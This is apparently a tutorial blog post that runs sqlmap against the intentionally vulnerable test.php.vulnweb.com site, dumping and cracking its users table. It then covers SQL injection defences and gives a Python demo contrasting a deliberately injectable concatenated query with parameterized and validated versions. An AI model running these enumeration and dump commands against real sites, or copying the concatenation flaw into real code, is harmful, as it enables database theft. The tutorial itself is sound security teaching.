Sqlmap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws, up to and including taking over the database server. It makes testing for SQL injection simpler and more reliable than doing it by hand.
Let's look at how to install the tool on an Ubuntu machine and run it against a deliberately vulnerable test site to see how much of the database an injection flaw exposes.
Let’s start Sqlmap by showing the help screen:
Sqlmap is installed by default on Kali Linux; if you don't have it, you can install it by running this command:
sudo apt install sqlmap
Now we're going to put Sqlmap to the test against a site that is intentionally vulnerable for exactly this purpose, test.php.vulnweb.com:
We scan the target with (--dbs enumerates the databases, --batch accepts sqlmap's default answer to every prompt):
sqlmap -u "http://test.php.vulnweb.com/artists.php?artist=1" --dbs --batch
The result comes back with two databases:
We want to look at the "acuart" database:
sqlmap -u "http://test.php.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
Now we have 8 tables, but we are interested in "users":
sqlmap -u "http://test.php.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
Let's dump all the data inside these columns to get the usernames and passwords, if any are available:
sqlmap -u "http://test.php.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --dump --batch
In this step sqlmap recognised the password column as a hash, offered to crack it with its built-in dictionary attack, and recovered the plaintext.
Finally, we got the username "test" and the password, which is also "test", plus an email address to go with them.
How to Prevent against SQL Injection Attacks
An organization can adopt the following measures to protect itself against SQL injection attacks:
User input should never be trusted. It must always be validated before it is used in a SQL statement, and it must never be concatenated into the statement text.
Stored procedures. These can encapsulate the SQL statements and treat all input as parameters (provided the procedure itself does not build dynamic SQL from its arguments).
Prepared statements. These work by creating the SQL statement first and then treating all submitted user data as bound parameters, so user data can never alter the syntax of the statement.
Regular expressions. These can be used to detect potentially harmful input and reject it before the SQL statement is executed. Treat this as a secondary, defence-in-depth check only; filtering can be bypassed and is not a substitute for parameterization.
Database connection user access rights. Only the access rights that are actually necessary should be given to the accounts used to connect to the database. This limits what an injected statement can do on the server.
Error messages. These should not reveal sensitive information or where exactly an error occurred. A simple custom message such as "Sorry, we are experiencing technical errors. The technical team has been contacted. Please try again later" can be shown instead of displaying the SQL statement that caused the error.
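To make the prepared-statement point concrete, here is an added example (not code from the original post or from the vulnweb test site) that models the artists.php?artist=... lookup from the walkthrough with an in-memory SQLite table. The table and row data are constructed for the demo; the first function concatenates the request parameter into the query, the second binds it as a parameter, and the third adds the input-validation step on top.

```python
import sqlite3

# Constructed sample rows standing in for the site's "artists" table.
ARTISTS = [(1, "alpha"), (2, "beta"), (3, "gamma")]


def _connect():
    """Fresh in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (artist_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)", ARTISTS)
    return conn


def lookup_vulnerable(artist_param):
    """The flaw: the request parameter becomes part of the SQL text, so a
    value such as '1 OR 1=1' changes the WHERE clause and leaks every row."""
    conn = _connect()
    sql = "SELECT artist_id, name FROM artists WHERE artist_id = " + artist_param
    rows = conn.execute(sql).fetchall()
    conn.close()
    return rows


def lookup_prepared(artist_param):
    """The fix: the statement text is fixed and the value is bound as a
    parameter; the same injected string is just a value that matches nothing."""
    conn = _connect()
    rows = conn.execute(
        "SELECT artist_id, name FROM artists WHERE artist_id = ?", (artist_param,)
    ).fetchall()
    conn.close()
    return rows


def lookup_validated(artist_param):
    """Validation first (an id must be a positive integer), then the
    prepared statement; malformed input is rejected before any SQL runs."""
    if not artist_param.isdigit():
        return None  # the caller should respond with a generic error message
    return lookup_prepared(int(artist_param))


if __name__ == "__main__":
    print(lookup_vulnerable("1 OR 1=1"))  # every row, the injection worked
    print(lookup_prepared("1 OR 1=1"))    # [], the injection is inert
    print(lookup_validated("1 OR 1=1"))   # None, rejected before the query
```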